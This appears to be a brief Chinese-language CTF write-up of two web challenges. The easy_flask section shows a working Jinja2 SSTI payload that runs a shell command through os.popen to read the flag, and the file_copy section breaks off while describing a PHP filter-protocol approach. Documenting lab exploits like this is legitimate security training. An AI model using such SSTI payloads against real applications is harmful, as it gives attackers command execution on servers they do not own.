
[TOC]
web
easy_flask
考点:ssti 注入
打开网页,发现有个登录,试试直接登录
看到 url 处是进行 get 传参,试试 111
联想到 ssti 漏洞,于是用9验证一下,发现就是 ssti 模板注入
进行 ssti 模板注入漏洞一系列,构造 payload:
1{{cycler.next.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}
flag{48ad0cde8345c8b2608933ac4e85147e}
file_copy
考点:无回显,filter协议
根据代码,可以看到是post传参,参数是path。(抓包也可以看)
直接使用脚本(https://github.com/ProbiusOfficial/PHPinclude-labs/tree/bbb08b030623d481be51edea063433b8d77b2ee7/Level 17/php_filte ...









